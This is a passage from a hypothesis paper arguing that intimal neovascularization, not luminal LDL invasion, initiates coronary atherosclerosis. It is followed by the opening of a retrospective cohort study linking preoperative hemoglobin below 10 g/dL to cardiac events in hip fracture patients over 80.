At approximately the same time, effective hypolipidemic drugs were developed and introduced to clinics, and the American Heart Association predicted that lowering blood cholesterol would almost eliminate the requirement for bypass surgery and eradicate coronary arteriosclerosis by the end of the 20 th century [5,34]. It is now known that HMG-CoA reductase inhibitors, cholesterol-lowering drugs known as "statins", are almost 100% effective in populations with high LDL-C levels, but normalizing LDL levels only reduces the risk of cardio-vascular diseases in this group by approximately 30-40% [23,[35][36][37][38], and the total number of coronary interventions (bypass and stenting operations) has increased significantly [39]. However, individuals with normal LDL-C levels suffer from coronary atherosclerosis, and although at lower risk, this includes vegetarians [40]. Numerous studies have demonstrated that coronary atherosclerosis affects all eutherian animals with a body mass comparable to or larger than humans, regardless of diet specialization and LDL levels [41][42][43][44][45]. Surprisingly, in these mammals, lipid accumulations in arterial walls were more common in herbivores than carnivores [43,46]. The lack of association between total or LDL cholesterol and degree of atherosclerosis in unselected individuals was demonstrated by a study during the 1930s [47] and has since been noted by many others, notably by W. E. Stehbens [48][49][50][51][52][53][54] and U. Ravnskov [55][56][57][58][59], and others, e.g. [60]. Therefore, the hypothesis that elevated blood cholesterol constitutes a major cause of coronary arteriosclerosis is questionable. Undoubtedly, high LDL levels are an important risk factor and a vital tool in CA prevention, but logically, it must be concluded that high LDL levels are not "a major cause" of coronary atherosclerosis.
Assumption: lipids act and invade coronary tunica intima from the arterial lumen
Factual discrepancies If high levels of LDL-C affect and invade arterial walls from the arterial lumen (Figure 1), then the initial and most pronounced lipid accumulation in the arterial tunica intima ought to be most proximal to the coronary blood flow, i.e. within inner layers of the tunica intima. However, detailed pathological studies concerning the early stages of human coronary atherosclerosis have demonstrated that the opposite is true, i.e. lipid deposits are initiated on outer layers of the coronary tunica intima [61,62], termed deeper musculoelastic layers (for morphological details and terms see [63]). A report published in 1968 described, although very briefly, the same morphological pattern during the early stages of human coronary atherosclerosis: initial lipid accumulation in the deepest intimal portion, followed by lipid deposition in the middle intimal zone [64]. This counterintuitive location of lipid depositions is very important for understanding the pathogenesis of coronary atherosclerosis, and I term this phenomenon the "outer lipid deposition paradox". Nakashima et al. explained the outer lipid deposition paradox by demonstrating that accumulation of proteoglycan biglycan occurs predominantly in the outer layers of the tunica intima of normal and diseased individuals, i.e. in the same location as the initial accumulation of lipids. Furthermore, Nakashima et al. suggested that biglycan possesses specific binding properties for atherogenic lipoproteins. They noted that structural changes in biglycan could increase its binding properties, and suggested a possible source of biglycan expression in agreement with previous reports [65,66]. Noting some discrepancy in patterning, i.e. that lipids deposit eccentrically, whereas biglycan is localized concentrically [62], the authors elaborated these specifics in this and a later publication [67].
In addition to reporting significant findings on the precise location of lipid depositions during initiation of coronary atherosclerosis, this work univocally demonstrates that normal coronary tunica intima is not a single-layer endothelium covering a thin acellular compartment, as is commonly claimed in all mainstream scientific publications and educational materials (e.g. Figures 1 and 2), but a multi-layer cellular compartment where cells and matrix are arranged in a few dozen layers.
However, this is not a new discovery in coronary morphology. In 2002 Nakashima et al. published a complete morphological analysis concerning normal post-natal development of human coronary arteries, demonstrating that the epicardial coronary tunica intima invariably forms a multilayered cellular compartment, or diffuse intimal thickening (DIT) [68], known as normal arterial intimal hyperplasia [69]. Please note, this morphogenesis Nakashima et al. [68] credited all previous reports concerning DIT in normal human coronaries, beginning with a famous publication by Richard Thoma in 1883 [70] and concluding with modern papers, e.g. [71]. These references could be supplemented with dozens of others demonstrating that the formation of DIT in normal coronaries is universal in humans. One particular publication, written by Dr. Kapitoline Wolkoff in 1923 [72], was pioneering in relation to the detailed morphology of post-natal human coronary ontogenesis. In her observations, the intimal structures (in German "Bindegewebsschicht" and "Elastisch-hyperplastische Schicht") above a lamina elastica interna correspond to DIT in the modern literature [63,67,68,73].
To my knowledge there are no definitive data concerning the number of cell layers forming DIT, which varies in formalin-fixed specimens owing to artery contraction in fixative [63]. In addition to individual variations, the latter could explain differences in DIT thickness in various reports, e.g. [68,72,74]. Therefore, it is difficult to determine an exact number of cell layers in DIT, although extrapolating from all available reports it can be approximated as between 20-25 and 35-50 cell layers. Coronary artery DIT has been found in all studies concerning vertebrates with a body mass similar to or larger than humans (for review see [69]), and taxonomy-wise starting with fishes [75]. Unfortunately, these fundamental facts have not been widely appreciated during medical research and education, which commonly operates on the assumption that normal coronary arterial tunica intima is always an "ideal" single-layer endothelium covering an acellular compartment [4][5][6]76], or denying the presence of coronary DIT in animals [77].
Discussion
When considering coronary atherosclerosis, we inevitably focus on atherosclerotic plaques, their vulnerability and rupture, lipid and necrotic core, fibrous cap and thickness, as these features determine morbidity and mortality. However, these are features of advanced stages of the disease, and such lesions [78][79][80] are extremely resistant to therapeutics. Progress in plaque stabilization and regression has been reported, but the probability that these patients will require coronary intervention is very high (for review see [81]). This analysis concerns initiation and early stages of CA, which should be more receptive to therapeutics and are potentially reversible. In addition, initial tissue transformations are more informative in terms of elucidating mechanisms of disease, as later pathological formations (e.g. mature plaque) include significant secondary lesions, which could mask crucial features of disease pathogenesis.
An important part of this analysis is devoted to the consistency of the hypothesis that guides our efforts to understand coronary atherosclerosis, relating to facts concerning normal coronary morphology and the diseased state. As demonstrated above, the morphology of human coronary arteries is not what is commonly claimed in analyses relating to coronary atherosclerosis, which underlies approaches to finding a cure. Unfortunately, this inaccurate perception of coronary artery morphology has led to hypotheses that imply that DIT is a dimensionally insignificant compartment, e.g. [4][5][6]. Furthermore, such depiction appears in articles that include micrographs of coronary artery histological slides that demonstrate the real ratio between coronary artery coats, e.g. [82] Therefore, although the coronary tunica intima is a multi-layered cellular compartment equal to or thicker than the tunica media [62,63,67,68,70,72,[83][84][85], there is a common perception that the human coronary tunica intima is a one-cell layer covering a thin matrix layer [4][5][6]82,86]. Since this perception is very persistent in scientific publications and educational materials, I believe it is worthwhile to look for a reason for this misinterpretation.
Custom replies such as: "it is just an unimportant visual (or verbal) schematic, but the foundation of the hypothesis is correct" are not convincing. A schematic that presents a hypothesis is the essence of the hypothesis. Therefore, if the schematic is incorrect, the hypothesis must be incorrect too.
Incorrect presentation of human coronary morphology (depicting the tunica intima as one cell layer covering a thin matrix layer) has several negative consequences, but the most crucial is that such misperception cannot incorporate the outer lipid deposition paradox. Even when early intimal lipid deposition is mentioned, incorrect presentation of tunica intima morphology as a one cell layer structure covering a thin matrix layer does not make outer lipid deposition surprising (paradoxical) and prevents a hypothesis from using this observation as a tool during analysis of the disease pathogenesis [82].
One plausible explanation for this oversight could be that medical scientists in mainstream research are not aware of the exact coronary artery morphology or consider it an insignificant detail. This is probably a reflection of how coronary histology is taught to medical students. Any standard textbook of histology, e.g. [87][88][89], and most monographs concerning coronary disease, e.g. [90][91][92][93], present coronary morphology in this way. The famous "Color Atlas of Cytology, Histology, and Microscopic Anatomy" used by medical students and published by Wolfgang Kuehnel [94], which was translated into all Western languages, does not include coronary artery morphology, leaving readers with the illusion that it has the same morphology as any artery of this caliber. At best, some textbooks comment briefly that the intima of elastic arteries may be thicker [95,96] or that the intima of coronary arteries demonstrates the greatest age-related changes [97,98], still stressing the single-cell layer intimal design. An example of such misrepresentation appears in the very popular Medscape website (a part of WebMD), which advertises itself as: "Medscape from WebMD offers specialists, primary care physicians, and other health professionals the Web's most robust and integrated medical information and educational tools" [99]. In its recently updated article relating to coronary artery atherosclerosis, Medscape states: "The healthy epicardial coronary artery consists of the following 3 layers: Intima, Media, Adventitia. The intima is an inner monolayer of endothelial cells lining the lumen; it is bound on the outside by internal elastic lamina, a fenestrated sheet of elastin fibers. The thin subendothelial space in between contains thin elastin and collagen fibers along with a few smooth muscle cells (SMCs)" [100]. The few modern textbooks presenting correct information, e.g. "Histology for Pathologist" [101] and "Vascular Pathology" [102], have not changed this common perception. Regardless of whether the above explanation is correct or not, this misperception of coronary artery design persists in research and education.
Failure to incorporate facts concerning coronary artery design into hypotheses relating to the mechanism(s) of coronary atherosclerosis is worrying. The accepted hypothesis describes lipid invasion into the coronary DIT from the arterial lumen [5,6,82,86,103,104]. The accepted vector and topology of events is the core of the hypothesis and the assumed mechanism of the disease: "Lipids enter the arterial wall as compounds with protein fractions of blood plasma directly from arterial lumen" [105]. This pathway is univocally incorporated in the currently endorsed hypothesis and all offshoot models. Logically, from these models, initial lipid deposition in the tunica intima should be more proximal to the lumen. However, it has been demonstrated that lipid accumulation appears not in the inner layers of DIT, which are proximal to the lumen, but in the distant outer layers [61,62,64,67]. Obviously, to reach an outer intimal layer, lipids are required to diffuse through numerous cell layers and a significant amount of matrix situated between the intimal cells. However, in diffusion or "filtration pressure" [106] models, the highest lipid accumulation must be most proximal to a lumen, diminishing proportionally to intimal depth, comparable to patterns of lipid accumulation in tunica intima of non-diseased human aortas of individuals aged 6-15 years [107]. Therefore, why does lipid accumulation in coronary atherosclerosis start in the deep layers of DIT, just above the internal elastic lamina, distant from the lumen? To explain this contradiction, the conventional hypothesis has to relate to certain conditions under which this puzzling pattern could be theoretically possible: e.g. co-localization of proteoglycan biglycan (which has a high binding capacity for lipoproteins) in the outer layer of DIT [62,67,82]. However, findings concerning biglycan location [62,67] could explain retention but not penetration, and even the former can only be explained with reservations: biglycan is expressed in several tissues of the body, so why is the outer DIT of coronary the target? Is this complicated model the only explanation?
Details of coronary artery structure are critically important for this analysis. Therefore, it is necessary to enumerate undisputed facts concerning coronary artery morphology. The human heart has coronary arteries in which a single-cell layer of tunica intima differentiates early in life to form DIT, and then continues to self-renew in a controlled manner throughout life in a majority of the population. When normal DIT becomes diseased, it is difficult to distinguish early pathology morphologically from the norm [108,109], and sometimes this is the case with advanced stages (post-transplant coronary atherosclerosis) [76]. Normal DIT, or normal intimal hyperplasia, is so striking in its resemblance to diseased hyperplasia that the former is known as "benign intimal hyperplasia" [110][111][112].
It is important to highlight that normal human coronary tunica intima, evolving from one cell-layer after birth to DIT in adults, is always the avascular compartment and remains avascular in the vast majority of hearts throughout life. Several studies have investigated this topic thoroughly and concluded that coronary tunica intima receives oxygen and nutrients through diffusion from the arterial lumen [106,[113][114][115][116]; a previous suggestion that nutrients from vasa vasorum can meaningfully contribute to coronary tunica intima nourishment [117] was never confirmed. Past findings concerning the vasculature in normal coronary intima [118], later reprinted in [119], were attributed to high pressure of injected dye (ten times higher than normal) [106]. Therefore, when DIT attains thickness of up to ten cell layers (at approximately five years old), inner and outer compartments of tunica intima are exposed to various concentrations of blood constituents, as diffusion is inversely proportional to the square of the distance (i.e. DIT thickness). When this distance is increased, as happens in adult coronary DIT, it must be assumed that contact of outer intimal layers with certain blood constituents would be significantly minimized, if not completely diminished. Therefore, for adult or aged-thickened [120] and diseased-thickened coronary tunica intima, diffusion deficit of the outer intimal layers can be assumed, similar to the model of Wolinsky and Glagov, known as "critical depth" of avascular media or "rule 29" [121].
As aforementioned, before plaque formation occurs, diseased DIT, or pathologic intimal thickening (PIT), is microscopically indistinguishable from normal DIT. However, there is one characteristic that distinguishes diseased coronary DIT from normal DIT: pathological DIT (PIT), even during the beginning of the disease, is always vascularized [106,[113][114][115]122]. This neovascularization, originating from adventitial vasa vasorum [123,124], is observed prior to the appearance of any atherosclerotic features except an increased dimension of DIT [125]. This neovascularization pattern is common in all diseased arterial DIT [126]. Contrary to a previous report concerning coronary atherosclerosis [118,119], in contemporary publications luminal neovascularization, although reported in one study, was found to be negligible: vasculature originating from adventitial vasa vasorum exceeds luminal vessels 28 times [127]. This intimal neovasculature exclusively terminates in the outer tunica intima of the atherosclerotic human coronary artery, just above the internal elastic lamina, [113,116,123,[127][128][129][130][131]. A comparable pattern of coronary outer tunica intima neovascularization has been demonstrated in a porcine model of coronary atherosclerosis [132]. Now, we shall enumerate the facts: (1) Normal coronary DIT is an avascular compartment, receiving blood constituents through diffusion from the arterial lumen; (2) Normal outer DIT is the most distant compartment from the arterial lumen and adventitial vasa vasorum. Therefore, the probability of diffusion to this depth of some blood constituents including LDL-C particles is very low; (3) The outer avascular tunica intima of normal and atherosclerotic coronary is always reached by proteoglycan biglycan, which has a high capacity for selective binding of lipoproteins; (4) In normal coronary artery, biglycan of the outer DIT does not have direct contact with blood, and interaction with LDL-C is prevented by diffusion distance and the properties of this molecule (20 nm); (5) In coronary atherosclerosis, the outer layers of DIT become exclusively neovascularized, and biglycan comes into direct contact with blood lipoproteins.
If the above statements stand, a simple conclusion can be reached: in coronary atherosclerosis, biglycan of the outer DIT should extract and retain LDL-C particles from newly formed capillary beds, which are known to be very permeable [133,134]. This mechanism does not require any conditioning or complicated explanatory pathways. Furthermore, as we know from observations, lipid accumulation during early stages of coronary atherosclerosis always begins in the outer layers of the coronary DIT [61,62,64,67].
The assumption that neovascularization of the outer tunica intima is the first step in pathogenesis results in a hypothesis that produces the simplest explanations: (1) an initial deep localization of lipid deposition in the tunica intima, (2) a certain probability of coronary lipid deposition and atherosclerosis development when blood LDL levels are normal if pathological neovascularization has occurred, owing to LDL-C accessibility for contact with previously avascular structures (biglycan, which has affinity to LDL-C, and should extract it regardless of LDL-C levels); (3) more probable lipid deposition and disease contraction at high blood LDL levels; (4) probability of coronary atherosclerosis development after high LDL levels are lowered through the use of drugs, as neovascularization has already occurred and LDL-C particles appear in direct contact with previously avascular structures (biglycan, which has affinity to LDL-C and should extract it regardless LDL-C levels). At this point in the analysis, neovascularization of the coronary tunica intima appears as a cause of coronary atherosclerosis. Therefore, it logically follows that since the presence of LDL-C in plasma is a fundamental metabolic requirement for humans [135], theoretically there is no "safe LDL-C level" that would be 100% certain to prevent coronary atherosclerosis if intimal neovascularization has already occurred. Therefore, the model predicts that if the coronary intima became vascularized, lipoproteins would be extracted and retained by intimal proteoglycan biglycan even if blood LDL levels were normal. However, lipoprotein extraction and deposition will be faster if LDL levels are high. These model predictions have been confirmed by clinical observations. Therefore, contrary to the accepted model, the author's hypothesis suggests a different cause of the disease, and the opposite route for invasion of atherogeneic lipoproteins into the coronary tunica intima.
It is plausible that other intimal components, which were expressed and stored in the avascular environment, would interact with blood lipoproteins in the neovascularized environment. Hypothetical affinity to and binding of lipoproteins could be the result of LDL-C availability and matrix modifications under oxygenized conditions [136].
The author's hypothesis does not refute the contribution of lipoprotein deposition from the arterial lumen. It is known that such deposition occurs in normal aorta, although resulting in a different pattern [107]. However, in the author's model, lipoprotein deposition from the arterial lumen becomes irrelevant. Let us just compare the probability of two events occurring (i.e. lipid deposition via two pathways): (1) lipoproteins travel from the arterial lumen through the endothelium and multiple cell/matrix layers to be deposited in the outer DIT; (2) lipoproteins exude into the outer DIT from newly formed capillary beds, which terminate directly into the outer DIT and are very permeable [133,134]. The greater likelihood of the second model is obvious. The same logic could be applied to infer a route of monocyte infiltration into the coronary intima.
In previous publications, a similar mechanism was suggested to contribute to progression of already formed coronary plaques and inflammation in advanced human coronary atherosclerosis [137][138][139][140]. However, all prior analyses stop short of suggesting that neovascularization of the outer tunica intima is the cause of the disease.
This suggested mechanism of pathology is not unique. The identical mechanism, involving neovascularization of a normally avascular tissue compartment, followed by lipoprotein deposition, is well known. Consider corneal lipid keratopathy. The cornea is normally an avascular compartment [141,142]. More than 50 years ago, Cogan and Kuwabara described cornea lipid keratopathy, consisting of lipid deposition followed by fatty plaque formation, as occurring only in corneal areas that have been previously neovascularized [143]. Furthermore, the authors pointed to morphological similarities between cornea lipid plaques and those in atherosclerosis, and suggested common pathogenesis [143]. In succeeding years, numerous reports reaffirmed a causal role of neovascularization in corneal lipid deposition and hence the main treatment modality has become the inhibition of neovascularization [141,142,[144][145][146][147][148][149][150][151][152][153]. In addition, there is only a single clinical observation of lipid keratopathy without prior neovascularization [154], and a single experimental study that disputes the causal role of neovascularization in corneal lipid deposition [155]. Furthermore, it has been noted that a role of inflammation during this pathogenesis is limited to the induction of angiogenesis [152]. Lipoprotein levels in the aqueous humor are thought to be close to those in blood [156][157][158][159][160][161]. It is important to note that although the corneal substantia propria is separated from aqueous humor by only one cell layer of descemet epithelium, lipid depositions have never been observed prior to corneal neovascularization (except the one report mentioned above [154]). This strongly favors the model of lipids exuding from permeable neovasculature into the cornea proper, rather than a diffusion model.
The fact that a similar sequence of events that includes lipid deposition underlines pathogenesis of the unrelated corneal disease reinforces the suggested new hypothesis concerning mechanisms of coronary atherosclerosis.
Why does arterial tunica intima become neovascularized in the first place? Early during life the tunica intima of human coronary arteries differentiates from a single-layer cell compartment into a multi-layer cellular structure (i.e. DIT) through proliferation of residual and medial cells, and probably through participation of bloodborn cells. Intimal proliferation with increasing numbers of cells continues until approximately 30 years of age [68,72] and then maintains self-renewal in a controlled manner throughout life. The mechanisms that initiate this morphogenesis and control it later during life are unknown, but it can be concluded that cells in the coronary tunica intima possess inherently high proliferative capacity. During normal growth transformations the coronary DIT remains avascular, so its dimension (thickness) allows all intimal cells to receive sufficient oxygen and nutrients through diffusion from the arterial lumen.
If we were to choose one feature that would universally reflect the reaction of the arterial tunica intima, and particularly the coronary intima, to a variety of stimuli, injuring factors, and interventions in clinics and experiments, the answer is undoubted -it is intimal cell proliferation. Regardless of the nature and magnitude of stimuli/ insults, cells that appear in the arterial intimal compartment (normal or artificial, e.g. [162][163][164][165][166][167]), always proliferate in response. Furthermore, it is known that the arterial tunica intima can develop two normal variant phenotypes: a one-cell lining and a multi-layered cellular compartment, i.e. DIT. The first phenotype is maintained in all small and most medium caliber arteries, but certain arterial segments (e.g. coronary) normally evolve into the second phenotype. Each intimal type can be maintained as stable phenotypes or produce excessive intimal cell proliferation. Multiple observations have demonstrated that cells participating in this morphogenesis can be of different origins. As to regulations directing normal and pathological morphogenesis, a shear stress was suggested as the major factor [168][169][170][171][172][173][174][175][176][177][178]. In addition, I hypothesized that the arterial blood-tissue interface itself (as a topological entity) contributes to this morphogenesis, and the enhanced proliferative capacity of the arterial intima is a reflection of phenotype selection [69,179] (though these statements do not suggest mechanisms of regulation). All observations demonstrate that intimal proliferation can be induced by a variety of stimuli and insults that are different in nature and magnitude, which suggests that these stimuli and insults act as non-specific factors triggering preexisting regulation for proliferative morphogenesis. The ability of the arterial intima, and particularly coronary intima, to slip into proliferative morphogenesis was described as a genetic predisposition, which could manifest in "a hyperplastic vasculomyopathy" [180].
Therefore, cells in the coronary tunica intima respond by proliferating to any stimuli, exogenous or endogenous. An increase in cell numbers inevitably expands intimal thickness, which occurs with aging [119,181]. Expanded intimal thickness impairs diffusion of oxygen, as diffusion is inversely proportional to the square of the distance. Insufficient oxygen diffusion would inevitably result in hypoxia, specifically of cells in the outer DIT, because this tissue compartment is the most distant from the lumen and adventitial vasa vasorum [182].
What would happen when the coronary DIT becomes larger owing to cell proliferation or excessive matrix deposition (I did not mention a possible participation of intimal matrix before because there are few facts describing this pathway)? A straightforward answer was given by Gladstone Osborn: "When the intima of the coronary artery exceeds a certain thickness parts must either die or develop secondary blood supply" [183]. Since tissue hypoxia is a known inducer of angiogenesis and pathological neovascularization [184,185], neovascularization of the outer compartment of disease coronary DIT from adventitial vasa vasorum must follow coronary DIT expansion. The author agrees with Geiringer's assertion that ". . .intimal vascularization is a function of intimal thickness and not of atherosclerosis" [105]. Furthermore, the author's deduction from the above is that intimal proliferation/thickening and neovascularization are the causes of coronary atherosclerosis. Therefore, it is hypothesized herein that proliferation of intimal cells initiates atherosclerosis. This is not a new model. This mechanism was suggested some time ago, although omitting subsequent neovascularization of coronary DIT [186][187][188][189][190][191][192]. However, the viewpoint that intimal cell proliferation is the beginning of atherosclerosis [186][187][188][189][190][191][192] was superseded by the currently endorsed hypothesis, which asserts that arterial intimal proliferation is an event secondary to lipid/macrophage penetration and inflammation [2,3,5,6,193]. Reflecting on the convenient hypothesis, the current classification of atherosclerosis excludes a variety of arterial pathologies characterized by intimal cell proliferation [194]. However, the currently endorsed hypothesis is based on an incorrect perception of coronary artery morphology. DIT enlargement and subsequent neovascularization were not recognized as initiators of the disease, and this view does not acknowledge outer lipid deposition as paradoxical. The currently endorsed model, based on invasion of lipoproteins from the coronary lumen, is very unlikely in the light of preceding DIT neovascularization. In the model outlined herein, neovascularization of the deep layers of DIT from the vasa vasorum makes initial outer intimal lipid deposition logical not paradoxical. Neovascularization of the previously avascular deep layers of coronary DIT, resulting in availability of blood lipoproteins to be extracted and retained by the DIT matrix, explains controversies regarding normal LDL-C levels (spontaneous or drugmodulated) and risks for coronary atherosclerosis.
The suggested hypothesis can be presented in the following schematics ( Figure 6):
Summary
(1) A hypotheses underlining our efforts to approach coronary atherosclerosis must be consistent with undisputed facts concerning the subject. Furthermore, a hypothesis should incorporate logical evaluation, and not contradict established and proven concepts in biology and medicine without well-grounded reasons.
(2) Atherosclerosis occurs in arteries with normal DIT, while sparing the rest of arterial bed. However, while normal DIT exists in numerous arteries [120,194], some of these are never affected by atherosclerosis; coronary arteries are almost always the target. On logical grounds, an arterial disease that never affects some arteries but usually affects certain others is not systemic.
(3) Coronary atherosclerosis is not an inflammatory disease, as multiple clinical trials demonstrate no correlation between anti-inflammatory therapies and risk of disease.
(4) High LDL levels are not a fundamental cause of coronary atherosclerosis, as lowering such levels protects only 30-40% of those at risk. Furthermore, humans and animals with normal LDL levels can suffer from coronary atherosclerosis. (5) Neovascularization of the normally avascular DIT is the obligatory condition for coronary atherosclerosis development. This neovascularization originates from adventitial vasa vasorum and vascularizes the outer part of the coronary DIT, where LDL deposition initially occurs. (6) It is suggested that excessive cell replication in DIT is a cause of DIT enlargement. Participation of enhanced matrix deposition is also plausible. An increase in DIT dimension impairs nutrient diffusion from the coronary lumen, causing ischemia of cells in the outer part of coronary DIT. (7) Ischemia of the outer DIT induces angiogenesis and neovascularization from adventitial vasa vasorum. The newly formed vascular bed terminates in the outer part of the coronary DIT, above the internal elastic membrane, and consists of permeable vasculature. (8) The outer part of the coronary DIT is rich in proteoglycan biglycan, which has a high binding capacity for LDL-C. While in avascular DIT, biglycan has very limited access to LDL-C due to diffusion distance and LDL-C properties; after neovascularization of the outer DIT, proteoglycan biglycan acquires access to LDL-C particles, and extracts and retains them. (9) Initial lipoprotein influx and deposition occurs from the neovasculature originating from adventitial vasa vasorum -and not from the arterial lumen. (10) Although lipoprotein deposition in the outer part of the coronary DIT is the earliest pathological manifestation of coronary atherosclerosis, intimal neovascularization from adventitial vasa vasorum must precede it.
Therefore, in the coronary artery tunica intima, a previously avascular tissue compartment becomes vascularized. All other tissue compartments are developed (both phylogenetically and ontogenetically) with constant exposure to capillary bed and Figure 6 Schematic representations of the mechanism of CA. anormal coronary artery. Coronary tunica intima forms DIT with biglycan accumulations in the outer DIT, which is most distant from the arterial lumen. b -DIT enlarged by cell proliferation and matrix production. Cells in the outer DIT underwent hypoxia due to increased diffusion distance. cneovascularization of the outer DIT from adventitial vasa vasorum. Newly formed vessels are highly permeable. dbiglycan of the outer DIT comes in direct contact with blood LDL-C, which facilitates binding, retention and deposition of LDL-C in outer DIT, while inner DIT is free from lipoproteins. This schematic stage d corresponds to fatty streak Grade 1 and Grade 2 in the Nakashima et al. study [62]. Please note, in the schematic of a normal coronary artery (a), the number of DIT layers shown is less than my estimation in the text. This alteration was necessary to present half of the arterial circumference and emphasize DIT enlargement at the same time in the picture. blood, therefore their tissue components were selected not to bind LDL. This is why atherosclerosis is mostly limited to the coronary arteries. To my knowledge the only other examplethe avascular corneashows the same lipid deposition after neovascularization.
The author does not claim that his hypothesis offers an immediate solution. Intimal cell proliferation, producing DIT and its later expansion, is cell hyperplasia, meaning that newly arrived cells are similar to normal residual cells, making systemic targeting very difficult. While the author strongly believes that intimal neovascularization is the crucial step in the pathogenesis of coronary atherosclerosis, there are obvious concerns about angiogenesis inhibition in a heart with an already jeopardized myocardial blood supply. The author does not intend to suggest an immediate solution. The goal was to evaluate the hypothesis and the perceptions that we exercise in approaching coronary atherosclerosis logically and factually, and to offer a more coherent model. Furthermore, the intent was to underline paradoxical observations that could provide new insights into mechanisms of the disease. Atherosclerotic plaque growth and rupture are not paradoxical but anticipated events. In contrast, initial lipid deposition in outer layers of DIT with no deposition in inner layers is a paradoxical observation, and requires an explanatory model that differs from the accepted one. However, to recognize the paradox, correct perception of the coronary artery structure, where pathology occurs, must not be distorted by incorrect illustrations and verbal descriptions. When we name or depict things incorrectly, often just for nosological reasons, the incorrect perception of events may persist in spite of growing knowledge, impeding our attempts to discover the truth.
Conflict of interest
The author declares that he has no competing interests.
Author's contribution VMS conducted all the work involved in preparing and writing this paper. | 2023-01-18T14:37:22.305Z | 2012-04-10T00:00:00.000 | {
"year": 2012,
"sha1": "74c7f6c4dfe9ed7df868c2e68235965c1f4eda3f",
"oa_license": "CCBY",
"oa_url": "https://europepmc.org/articles/pmc3492120?pdf=render",
"oa_status": "GREEN",
"pdf_src": "SpringerNature",
"pdf_hash": "74c7f6c4dfe9ed7df868c2e68235965c1f4eda3f",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": []
} |
259182540 | pes2o/s2orc | v3-fos-license | Preoperative Hemoglobin <10 g/DL Predicts an Increase in Major Adverse Cardiac Events in Patients With Hip Fracture Over 80 Years: A Retrospective Cohort Study
Background Preoperative anemia has been associated with perioperative morbidity and mortality in patients undergoing cardiac and non-cardiac surgery. Preoperative anemia is common in elderly hip fracture patients. The primary objective of the study was to explore the relationship between preoperative hemoglobin levels and postoperative major adverse cardiovascular events (MACEs) in hip fracture patients over 80 years. Methods The retrospective study enrolled hip fracture patients over 80 years from January 2015 to December 2021 in our center. The data were collected from the hospital’s electronic database after approval by the ethics committee. The primary objective of the study was to investigate MACEs, and the secondary objectives included in-hospital mortality, delirium, acute renal failure, ICU admission rate, and transfusion (>2 U). Results 912 patients were entered for final analysis. Based on the restricted cubic spline, the risk of preoperative hemoglobin (<10 g/DL) was associated with an increased risk of postoperative complications. With univariable logistic analysis, a hemoglobin level <10 g/DL was associated with increased MACEs [OR 1.769, 95% CI (1.074, 2.914), P = .025], in-hospital mortality [OR 2.709, 95% CI (1.215, 6.039), P = .015] and transfusion >2 U risk [OR 2.049, 95% CI (1.56, 2.69), P < .001]. Even after adjustment for confounding factors, MACEs [OR 1.790, 95% CI (1.073, 2.985), P = .026], in-hospital mortality [OR 2.81, 95% CI (1.214, 6.514), P = .016] and transfusion >2 U rate [OR 2.002, 95% CI (1.516, 2.65), P < .001] were still higher in the lower hemoglobin level cohort. Moreover, a log-rank test showed increased in-hospital mortality in the cohort with a preoperative hemoglobin level of <10 g/DL. However, there was no difference in delirium, acute renal failure, and ICU admission rates. Conclusions In conclusion, for hip fracture patients over 80 years, preoperative hemoglobin levels <10 g/DL might be associated with increased postoperative MACEs, in-hospital mortality, and transfusion >2 U.
Introduction
Hip fracture is the main traumatic injury among seniors and has become a public health issue with a growing aging population. Comorbidities in older patients may deteriorate rapidly due to direct and indirect influences such as immobilization, pain and anemia. In addition, the hip fracture results in blood loss and may lead to or worsen anemia in elderly patients. [1][2][3][4] Preoperative anemia is associated with perioperative morbidity and mortality in patients undergoing cardiac and non-cardiac surgery. [5][6][7][8][9][10] Hemoglobin levels below 12 g/dL in women and below 13 g/DL in men are defined as anemia by the WHO. 11 Anemia is common in older patients, especially in traumatic surgery patients. Preoperative anemia can affect functional mobility (heart, brain, kidney) of surgical patients. Research indicates that the clinical outcomes of anemia might result from anemia-induced tissue hypoxia. 12 Few studies have addressed the relationship between preoperative anemia and postoperative outcomes in patients over 80 years undergoing hip surgery and the optimal level of preoperative hemoglobin in these patients. The purpose of this retrospective observation study was to investigate the relationship between preoperative hemoglobin levels and postoperative morbidity and mortality in this subgroup of patients.
Data Sources and Study Population
After approval from the institutional Ethics Committee, we accessed the medical records of all eligible patients via the clinical electronic database. This was a retrospective cohort study and the procedure followed strobe guidance. Data on elderly surgical patients (over 80 years) with hip fractures were extracted from the clinical electronic database from January 2015 to December 2021. The exclusion criteria were as follows: (1) multiple fractures; (2) other surgeries within 3 months; (3) revision surgery; (4) brain surgery history; (5) missing baseline data.
Endpoints
The primary outcome was major adverse cardiac events (MACEs). The secondary outcomes were in-hospital mortality, delirium, acute renal failure (ARF), ICU admission, and perioperative transfusion (>2 U). MACEs refer to recurrent angina, myocardial infarction, cardiac failure, malignant arrhythmia, and death from cardiovascular causes. A decrease in eGFR and an increase in creatine were used to diagnose ARF. Delirium was diagnosed through the Confused Assessment Method (CAM-5).
Covariates Associated With Endpoints
Demographic variables were extracted for baseline characteristics. Comorbidities were recorded, including hypertension, diabetes, chronic obstructive pulmonary disease (COPD), coronary artery disease (CAD), heart failure, atrial fibrillation, stroke, renal failure, and cancer. Anesthesia types included general anesthesia with a nerve block, nerve block with sedation, and neuraxial anesthesia. The hip fracture types were intertrochanteric, subtrochanteric, femoral neck, and trochanter. Surgical procedures included internal fixation, hemiarthroplasty, and arthroplasty.
Statistical Analysis
The continuous variables are presented as the mean (SD), and the proportion is presented for categorical variables. The enrolled patients were divided into 4 cohorts as indicated by the transfusion guidelines for comparison of baseline characteristics. For analysis of variance, the chisquare test, Fisher exam test, or Kruskal-Wallis rank-sum test were applied as appropriate. To explore the association between the level of preoperative hemoglobin and all endpoints of elderly patients over 80 years undergoing hip fracture surgery, restricted cubic spline curves (RCSs) were used based on Cox proportional hazards models with 4 knots at the 5th, 35th, 65th, and 95th percentiles. 13 The analyses were adjusted for age, sex, preoperative days, and comorbidities. Primary and secondary outcomes were analyzed using both unadjusted regressions and adjusted multivariable regression, with a preoperative hemoglobin level of 10 g/DL as the reference group based on the RCS curve. For sensitivity analyses, the subgroup of patients aged from 80 years to 89 years were tested for all endpoints. A two-tailed P value of less than .05 was considered statistically significant. All analyses were processed using SPSS 26.0 and R version 4.0.
Results
From 2015 to 2021, a total of 1 116 hip fracture patients over 80 years enrolled in the study. Seventy-two patients were excluded with multiple injuries/multiple procedures during the same admission period. Patients undergoing ipsilateral revision procedures were also excluded. Ten patients were excluded for receiving other surgeries within 3 months. Another sixty-six patients were excluded for missing baseline data. A total of 912 eligible hip fracture patients over 80 years of age were included in the study ( Figure 1).
Preoperative Hemoglobin and Endpoints
